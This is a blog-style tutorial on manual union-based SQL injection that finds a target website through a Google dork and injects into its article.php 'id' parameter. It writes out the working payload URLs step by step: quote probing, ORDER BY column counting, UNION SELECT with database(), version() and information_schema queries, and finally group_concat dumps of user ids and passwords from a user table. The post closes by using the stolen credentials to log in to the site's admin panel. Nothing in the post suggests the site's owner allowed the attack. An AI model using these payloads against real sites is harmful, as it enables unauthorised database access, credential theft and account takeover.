Introduction to SQL injection - manual union-based

Hey pen-testers, today in this post I am going to give details on one of the top-most vulnerabilities in today's world: SQL injection.

For this you need a SQL-vulnerable website and HackBar, a Firefox plugin, and that's it. You can download HackBar from here: https://addons.mozilla.org/en-us/firefox/addon/hackbar/

Back to the main point: in this article I am using the Google dork "article.php?id=5"

and I got a website: www.designsmells.com/article.php?id=5

Now, to check whether the site is vulnerable to SQL injection or not, we just append a single quote ( ' ) without the brackets and see whether we get an error or not. Let's see:

http://www.designsmells.com/article.php?id=5' -> produces an error, so it is clear that we have a website with SQL injection

[screenshot: the resulting SQL error]

PART 2: GETTING THE NUMBER OF COLUMNS

In order to get the number of columns we can use any of these statements:

  • ORDER BY
  • GROUP BY
  • PROCEDURE ANALYSE()

So to get the columns we try "order by", with two minus signs at the end to comment out the rest of the query so that it executes without error:

"www.designsmells.com/article.php?id=5 order by 1 --" -> no error

"www.designsmells.com/article.php?id=5 order by 10 --" -> no error

"www.designsmells.com/article.php?id=5 order by 15 --" -> error

So the number of columns lies between 10 and 15 (10 < n < 15). Keeping on checking, we find that there are 11 columns:



"www.designsmells.com/article.php?id=5 order by 11 --" -> no error

Then select everything after ?id=5 and replace it with "union select 1,2,3,4,...,11 --"

so that the URL becomes

"www.designsmells.com/article.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--" and hit enter.


If there is no change, just add a "-" in front of the ID and a "+" at the end, so the URL becomes "www.designsmells.com/article.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--+". It will dump out the vulnerable columns (the column numbers that get printed on the page). To get the database we choose the number that appears in bold letters.


PART 3: GETTING CREDENTIALS!!

Here we replace the column number "2" first with "database()" and then with "version()" to get the database name and the version respectively,

and the URL becomes: "www.designsmells.com/article.php?id=-5 UNION SELECT 1,database(),3,4,5,6,7,8,9,10,11--+"

[screenshot: the database() result]

Then we check version() with: "www.designsmells.com/article.php?id=-5 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11--+"


Now replace version() with "group_concat(table_name,0x0a)" and add " from information_schema.tables where table_schema=database() ",

and we get the desired URL: "www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--+"


We get the table names. Next we change the URL to: "www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database()--+"

It will dump out the various columns. Out of these we focus on columns named like admin, login, user, etc., and here we clearly get the "user_id" and "password" columns. So our next step is to get the data out of these two:

"www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(user_id,0x3a,user_name,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11 from book_user--+" and thus we get the user id along with its password.

[screenshot: the final result]

Once we have found the admin panel of the website, either using robots.txt or the Alchemist admin finder, we can log in to the website like a genuine user.

Stay tuned guys & keep on testing 🙂
